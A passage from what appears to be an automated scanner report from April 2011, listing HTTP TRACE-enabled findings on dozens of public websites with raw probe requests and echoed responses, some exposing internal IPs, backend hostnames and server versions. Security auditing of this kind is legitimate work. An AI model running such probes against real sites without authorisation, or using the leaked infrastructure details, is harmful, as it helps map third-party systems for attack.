Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mapsofworld.com
Cookie: 674bb8472c974c6f


21.152. http://www.mediatakeout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediatakeout.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mediatakeout.com
Cookie: eff1e1a632404552

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:39 GMT
Server: Apache/2.2.8 (Ubuntu)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mediatakeout.com
Cookie: eff1e1a632404552


21.153. http://www.medicalnewstoday.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalnewstoday.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.medicalnewstoday.com
Cookie: b8437cd3628dac81

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:23 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.medicalnewstoday.com
Cookie: b8437cd3628dac81


21.154. http://www.menupages.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.menupages.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.menupages.com
Cookie: ea3bf7a5761eb8e6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.menupages.com
Cookie: ea3bf7a5761eb8e6
X-Forwarded-For: 173.193.214.243


21.155. http://www.metafilter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metafilter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.metafilter.com
Cookie: 68aabb5ddf85eb1e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:46 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.metafilter.com
Cookie: 68aabb5ddf85eb1e


21.156. http://www.mindjolt.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mindjolt.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mindjolt.com
Cookie: 8d36b7cf2822ae46

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mindjolt.com
Cookie: 8d36b7cf2822ae46


21.157. http://www.miniclip.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miniclip.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.miniclip.com
Cookie: 9b2040074ee8ceda

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Content-Type: message/http
X-Cacheable: NO:Not-Cacheable
Content-Length: 126
Date: Sat, 02 Apr 2011 13:25:39 GMT
X-Varnish: 902365369
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: webftl61
X-Cache: MISS

TRACE / HTTP/1.0
Host: www.miniclip.com
Cookie: 9b2040074ee8ceda
X-Forwarded-For: 173.193.214.243
X-Varnish: 902365369


21.158. http://www.mochila.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mochila.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mochila.com
Cookie: 9ad861ce133c2e3b

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:45:11 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.mochila.com
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 9ad861ce133c2e3b
Connection: Keep-Alive


21.159. http://www.mp3raid.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mp3raid.com
Cookie: 3b82fdea94e32abc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mp3raid.com
Cookie: 3b82fdea94e32abc


21.160. http://www.mrmovietimes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrmovietimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mrmovietimes.com
Cookie: afd4039c9673b179

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mrmovietimes.com
Cookie: afd4039c9673b179


21.161. http://www.multiply.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.multiply.com
Cookie: d4c50a69cfba31df

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:38 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Cache-Control: max-age=25920000
Expires: Fri, 27 Jan 2012 13:37:38 GMT
Content-Type: message/http
X-Cache: MISS from multiply.com
Connection: close

TRACE / HTTP/1.1
Connection: close
Cookie: d4c50a69cfba31df
Host: ws577-fe.pn.pezarisdesign.com:32000
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.multiply.com
X-Forwarded-Server: multiply.com


21.162. http://www.mylocalemployment.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylocalemployment.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mylocalemployment.net
Cookie: 1f9dd41a33ccbc1e

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:56:31 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.mylocalemployment.net
X-Cluster-Client-Ip: 173.193.214.243
Cookie: 1f9dd41a33ccbc1e
Connection: Keep-Alive


21.163. http://www.mysanantonio.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysanantonio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mysanantonio.com
Cookie: c17086dae433ef7a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:15 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: close

TRACE / HTTP/1.1
Host: www.mysanantonio.com
Cookie: c17086dae433ef7a
Accept-Encoding: gzip
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY013-ASHB.COTENDO.NET (chpd/3.06.0052)


21.164. http://www.mystart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mystart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mystart.com
Cookie: c8aa7791f92888ef

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:19 GMT
Server: Microsoft-IIS/5.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: c8aa7791f92888ef
Host: www.mystart.com


21.165. http://www.myway.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myway.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.myway.com
Cookie: 6edcabcd2b0fb19c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:21 GMT
Server: Apache/2.0.43 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.myway.com
Cookie: 6edcabcd2b0fb19c


21.166. http://www.mywebsearch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mywebsearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mywebsearch.com
Cookie: 9f9612afe809f48e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mywebsearch.com
Cookie: 9f9612afe809f48e
X-Jabodo-For: 173.193.214.243


21.167. http://www.newgrounds.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newgrounds.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.newgrounds.com
Cookie: afe7b4015eb3ef76

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache/2.2.17 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.newgrounds.com
Cookie: afe7b4015eb3ef76


21.168. http://www.newsweek.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsweek.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.newsweek.com
Cookie: e6dc1dc72928a957

Response

HTTP/1.1 200 OK
Age: 0
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:26:37 GMT
Server: Apache
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 2022418692
Content-Length: 171
Connection: Close

TRACE / HTTP/1.1
host: www.newsweek.com
Cookie: e6dc1dc72928a957
X-Forwarded-Port: 80
X-Forwarded-Proto: http
X-Varnish: 2022418692
X-Forwarded-For: 10.223.62.50


21.169. http://www.nih.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nih.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nih.gov
Cookie: db28019783db12a6

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:23:39 GMT
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: www.nih.gov
Cookie: db28019783db12a6


21.170. http://www.npr.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: 8aa8252b840ae44a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: 8aa8252b840ae44a
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


21.171. http://www.nps.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nps.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nps.gov
Cookie: f06249f23b15d585

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:40:29 GMT
Content-Type: message/http
Content-Length: 97
Expires: Sat, 02 Apr 2011 13:40:29 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.nps.gov
Cookie: f06249f23b15d585
_FP_X_URL: http://www.nps.gov/


21.172. http://www.ocregister.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ocregister.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ocregister.com
Cookie: ba57f63db632c662

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ocregister.com
Cookie: ba57f63db632c662


21.173. http://www.onlinesearches.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinesearches.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.onlinesearches.com
Cookie: 1bb257344b356843

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.onlinesearches.com
Cookie: 1bb257344b356843


21.174. http://www.onlywire.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlywire.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.onlywire.com
Cookie: 3112ee4e8b879df2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.onlywire.com
Cookie: 3112ee4e8b879df2


21.175. http://www.openmyeyeslord.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openmyeyeslord.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.openmyeyeslord.net
Cookie: 212b59789f991a21

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.openmyeyeslord.net
Cookie: 212b59789f991a21


21.176. http://www.opera.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opera.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.opera.com
Cookie: 247651e61881aa1e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:17 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.opera.com
Cookie: 247651e61881aa1e
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.opera.com
X-Forwarded-Server: www.opera.com
Connection: Keep-Alive


21.177. http://www.outsidehub.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsidehub.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.outsidehub.com
Cookie: 6002f49d09f1c928

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.outsidehub.com
Cookie: 6002f49d09f1c928


21.178. http://www.parenting.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parenting.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.parenting.com
Cookie: b2b48c8e18c44a5e

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 128
Date: Sat, 02 Apr 2011 14:12:40 GMT
X-Varnish: 2020012493
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache12: MISS

TRACE / HTTP/1.0
Host: www.parenting.com
Cookie: b2b48c8e18c44a5e
X-Forwarded-For: 173.193.214.243
X-Varnish: 2020012493


21.179. http://www.pbs.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pbs.org
Cookie: c165129a0d28de7f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:30 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Content-Length: 303
Set-Cookie: www.apache.sid=16a73cde8bf7c09962e1c8a22a1f6d8e; path=/; domain=.pbs.org
Connection: close

TRACE / HTTP/1.1
host: www.pbs.org
Cookie: c165129a0d28de7f
MAX-FORWARDS: 9
X-Forwarded-Host: www.pbs.org
X-Forwarded-Server: www.pbs.org
X-Original-URL: http://www.pbs.org/
X-Forwarded-For: 173.193.214.243, 149.48.228.24
X-Forwarded-Port: 80
X-Forwarde
...[SNIP]...

21.180. http://www.peopleofwalmart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peopleofwalmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.peopleofwalmart.com
Cookie: 5578e542fe3b124d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.peopleofwalmart.com
Cookie: 5578e542fe3b124d


21.181. http://www.pgatour.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pgatour.com
Cookie: 56462c4418932335

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:41 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.pgatour.com
Cookie: 56462c4418932335
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.pgatour.com
X-Forwarded-Server: www.pgatour.com
Connection: Keep-Alive


21.182. http://www.pickyourown.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pickyourown.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pickyourown.org
Cookie: aa1691df677c1a75

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:09 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: aa1691df677c1a75
Host: www.pickyourown.org


21.183. http://www.picsearch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picsearch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.picsearch.com
Cookie: 37a99437bfdec998

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:03 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.picsearch.com
Cookie: 37a99437bfdec998


21.184. http://www.pittsburghlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pittsburghlive.com
Cookie: e93907c0f6f4a71

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.pittsburghlive.com
Cookie: e93907c0f6f4a71


21.185. http://www.playfin.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.playfin.com
Cookie: 6a9574b1d4eddbd6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:51 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.playfin.com
Cookie: 6a9574b1d4eddbd6


21.186. http://www.politicsdaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.politicsdaily.com
Cookie: 520d51af5877f5b0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.politicsdaily.com
Cookie: 520d51af5877f5b0
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:21:917D:200483,x-lb-client-ip:ajg_u


21.187. http://www.popularscreensavers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.popularscreensavers.com
Cookie: 11abf97cb14d7065

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.popularscreensavers.com
Cookie: 11abf97cb14d7065
X-Jabodo-For: 173.193.214.243


21.188. http://www.primarygames.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primarygames.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.primarygames.com
Cookie: e8f8d43475f08045

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:18:41 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.primarygames.com
Cookie: e8f8d43475f08045


21.189. http://www.pronto.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pronto.com
Cookie: e0d0eea6b234bf82

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:44 GMT
Server: Apache/2.2.4 (Fedora)
Connection: close
Content-Type: message/http
Via: CN-5000

TRACE / HTTP/1.0
Host: www.pronto.com
Cookie: e0d0eea6b234bf82
Via: CN-5000
Cres-Client-IP: 173.193.214.243
Connection: Keep-Alive


21.190. http://www.psu.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.psu.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.psu.edu
Cookie: e2a104a19001693e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:02 GMT
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e2a104a19001693e
Host: www.psu.edu


21.191. http://www.publicrecordschecks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicrecordschecks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.publicrecordschecks.com
Cookie: 3739531c99efd244

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.publicrecordschecks.com
Cookie: 3739531c99efd244


21.192. http://www.purdue.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purdue.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.purdue.edu
Cookie: 30ffec7a438a3f7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:36 GMT
Server: IBM_HTTP_Server
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerPool_old-PPWC_all=1729800384.0.0000; path=/

TRACE / HTTP/1.0
Host: www.purdue.edu
Cookie: 30ffec7a438a3f7


21.193. http://www.purplemath.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purplemath.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.purplemath.com
Cookie: 29ca8e3b5d74bced

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.purplemath.com
Cookie: 29ca8e3b5d74bced


21.194. http://www.quizlet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quizlet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.quizlet.com
Cookie: a4a517ecc5391b14

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Date: Sat, 02 Apr 2011 14:05:58 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-For: 173.193.214.243
Host: www.quizlet.com
Cookie: a4a517ecc5391b14
Connection: Keep-Alive


21.195. http://www.rasmussenreports.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rasmussenreports.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.rasmussenreports.com
Cookie: 4cef48a44583a75f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:48 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.rasmussenreports.com
Cookie: 4cef48a44583a75f


21.196. http://www.rawtube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.rawtube.com
Cookie: e518e292eaa63a02

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Content-Length: 125
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747459
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.rawtube.com
Cookie: e518e292eaa63a02
X-Varnish: 863747459
X-Forwarded-For: 173.193.214.243


21.197. http://www.rent.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rent.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.rent.com
Cookie: 5e7b2527606ea454

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 5e7b2527606ea454
Host: www.rent.com
X-NS-Forwarded-For: 173.193.214.243
X-NS-IP-Port: 10.63.8.10_80


21.198. http://www.retailmenot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retailmenot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.retailmenot.com
Cookie: cfa97be4589240c8

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Content-Length: 178
Connection: Close

TRACE / HTTP/1.1
host: www.retailmenot.com
Cookie: cfa97be4589240c8
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


21.199. http://www.retrevo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retrevo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.retrevo.com
Cookie: 8871f4c97521fcf5

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=4CC239D32C9D4452C2B2144F0716B71F; Path=/
Content-Type: message/http
Content-Length: 73
Date: Sat, 02 Apr 2011 13:38:22 GMT
Server: Apache-Coyote/1.1
Connection: close

TRACE /search HTTP/1.0
host: www.retrevo.com
cookie: 8871f4c97521fcf5

21.200. http://www.roxwel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.roxwel.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.roxwel.com
Cookie: 22e781c55d91754c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:07 GMT
Server: Apache/2.2.16 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.roxwel.com
Cookie: 22e781c55d91754c


21.201. http://www.salon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.salon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.salon.com
Cookie: 8da2e072bced114e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.salon.com
Cookie: 8da2e072bced114e
X-Forwarded-For: 173.193.214.243


21.202. http://www.sbnation.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sbnation.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sbnation.com
Cookie: ec9c73aa0e3318c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: Apache
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sbnation.com
Cookie: ec9c73aa0e3318c
X-Forwarded-For: 173.193.214.243


21.203. http://www.sfgate.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sfgate.com
Cookie: 46d631815af14745

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:15 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sfgate.com
Cookie: 46d631815af14745


21.204. http://www.sheknows.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheknows.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sheknows.com
Cookie: 259c52f4f98eba7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:24 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
X-Forwarded-For: 10.2.10.96, 173.193.214.243
Host: www.sheknows.com
Cookie: 259c52f4f98eba7


21.205. http://www.simplyrecipes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplyrecipes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.simplyrecipes.com
Cookie: a114b065d247fec0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:24 GMT
Server: Apache
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.simplyrecipes.com
Cookie: a114b065d247fec0


21.206. http://www.sing365.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sing365.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sing365.com
